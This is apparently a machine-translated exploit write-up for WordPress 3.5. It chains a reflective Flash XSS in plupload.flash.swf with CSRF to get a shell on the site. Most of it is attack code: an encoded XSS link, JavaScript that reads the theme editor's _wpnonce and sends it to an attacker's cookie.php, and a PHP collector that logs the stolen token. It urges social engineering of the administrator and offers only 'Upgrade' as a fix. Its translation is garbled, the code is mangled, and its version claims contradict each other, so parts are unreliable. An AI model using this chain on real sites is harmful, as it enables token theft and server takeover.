Wordpress anti-csrf token bypass

The wordpress background modification template anti-csrf token can be bypass. You can really use shell in combination with social engineering. No. This vulnerability does not exist in version 3.5.1 and earlier versions. Wordpress 3.5 and later versions have a flash xss. For details, seeFlash Application Security Series [3] -- WordPress reflective cross-site (0 day)Attackers can click your link CSRF to add a SHELL, which can be an anti-csrf token. However, they can use this XSS to steal anti-csrf tokens. In this way, they can smoothly use CSRF to get shell. Suppose we want to steal the token of the 404 template. Add the following link http: // localhost/wp-uplodes/js/plupload/plupload.flash.swf in the comments with the social worker? Id = 0 \ % 22% 29% 29} catch % 28e % 29 {if % 28! Window. x % 29 {window. x = 1; document. write ('<script src = http: // localhost/1.js> </script>');} // 1.js content is x = window. open ('HTTP: // localhost/wp-admin/theme-editor.php? File = 404.php& theme = twentytwelve '); setTimeout ("fuck (x)", 5000); function fuck (x) {var a=x.doc ument. getElementById ('_ wpnonce '). value; alert (a); location. href = 'HTTP: // localhost/cookie. php? C = '+ a;} the local cookie. php content is <? Phpfputs (fopen ("cookie.txt", "w"), $ _ GET [c]);?> After the Administrator clicks... You can see what you want in COOKIE. TXT. It is worth noting that this TOKEN will never change unless you reinstall WP. O, what do you know?
 Solution:

Upgrade